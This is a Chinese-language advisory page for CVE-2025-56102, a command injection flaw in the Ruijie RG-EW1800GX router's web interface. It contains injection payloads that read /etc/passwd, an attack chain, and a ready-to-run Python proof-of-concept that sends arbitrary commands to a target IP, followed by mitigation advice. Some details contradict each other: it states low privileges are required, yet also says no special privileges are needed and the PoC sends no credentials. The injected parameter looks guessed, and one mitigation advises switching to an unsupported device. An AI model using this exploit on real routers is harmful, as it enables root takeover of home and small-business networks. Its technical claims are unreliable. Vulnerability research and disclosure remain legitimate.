CVE-2025-56102 锐捷RG-EW1800GX路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56102

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1800GX (B11P226_EW1800GX_10223121)

漏洞概述

CVE-2025-56102是锐捷网络技术有限公司生产的RG-EW1800GX无线路由器中存在的一个高危操作系统命令注入漏洞。该漏洞位于设备的Web管理界面，具体位于/module_get接口处理程序中，涉及文件/usr/local/lua/dev_sta/networkConnect.lua。攻击者可以通过发送精心构造的POST请求，在受影响的设备上以最高权限（root）执行任意操作系统命令。由于该路由器通常部署在家庭和小型企业网络中，漏洞的利用可能对大量终端用户造成严重影响。攻击者成功利用此漏洞后，可以完全控制设备，执行恶意代码、窃取网络流量、植入后门或将其纳入僵尸网络。漏洞的CVSS评分为8.8，属于高危级别，攻击复杂度低，无需特殊权限即可发起攻击。

技术细节

该漏洞的根本原因在于设备Web服务器在处理/module_get接口的POST请求时，未对用户输入进行充分的过滤和验证，直接将可控参数传递给底层操作系统命令执行函数。具体而言，攻击者可以通过在POST请求的特定参数中注入分号、管道符或反引号等Shell命令连接符，突破应用程序的参数边界，执行额外的系统命令。漏洞位于Lua脚本文件/usr/local/lua/dev_sta/networkConnect.lua的module_get函数中，该函数负责处理网络连接相关的配置请求。攻击者只需构造形如';whoami;'或'|cat /etc/passwd|'的命令注入payload，即可获取设备shell访问权限。由于Web服务以root权限运行，注入的命令将以最高权限执行，攻击者可以获得设备的完全控制权。建议设备管理员尽快升级固件至最新版本，并在厂商发布补丁前，限制设备的远程管理界面访问。

攻击链分析

STEP 1

步骤1

信息收集：识别目标设备为锐捷RG-EW1800GX路由器，确定Web管理界面可访问

STEP 2

步骤2

访问/module_get接口，该接口由Lua脚本/usr/local/lua/dev_sta/networkConnect.lua处理

STEP 3

步骤3

构造恶意POST请求，在参数中注入OS命令（如';cat /etc/passwd;'）

STEP 4

步骤4

服务器未对输入进行过滤，将注入的命令传递给os.execute()函数执行

STEP 5

步骤5

命令以root权限在设备上执行，攻击者获取完全控制权

STEP 6

步骤6

攻击者可以安装后门、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56102 PoC - Ruijie RG-EW1800GX OS Command Injection
# Target: /module_get endpoint in /usr/local/lua/dev_sta/networkConnect.lua

def exploit(target_ip, port=80, cmd='whoami'):
    """
    Exploit OS Command Injection in Ruijie RG-EW1800GX
    
    Args:
        target_ip: Target device IP address
        port: Web management port (default: 80)
        cmd: Command to execute on the target
    
    Returns:
        Response from the vulnerable endpoint
    """
    url = f'http://{target_ip}:{port}/module_get'
    
    # Payload construction - inject OS command via POST parameter
    # The vulnerability allows command injection through specific parameters
    # that are passed to os.execute() or similar functions without sanitization
    
    payload = {
        'module': 'dev_sta/networkConnect',
        'action': 'connect',
        # Command injection via parameter manipulation
        'param': f';{cmd};'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-56102-PoC)'
    }
    
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f'Error: {str(e)}'

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip> [command]')
        print(f'Example: python {sys.argv[0]} 192.168.1.1 whoami')
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else 'whoami'
    
    print(f'[*] Targeting {target}')
    print(f'[*] Executing command: {command}')
    print('[*] Response:')
    print(exploit(target, 80, command))

影响范围

Ruijie RG-EW1800GX B11P226_EW1800GX_10223121及之前版本

防御指南

临时缓解措施

在厂商发布官方补丁之前，建议采取以下临时缓解措施：1）关闭路由器的远程管理功能，仅允许通过本地局域网访问；2）在网络边界设备上配置访问控制列表，限制对路由器管理端口的访问；3）监控设备日志，关注异常的POST请求模式；4）考虑更换为已停止支持的替代设备；5）启用双因素认证（如设备支持）以增加攻击难度。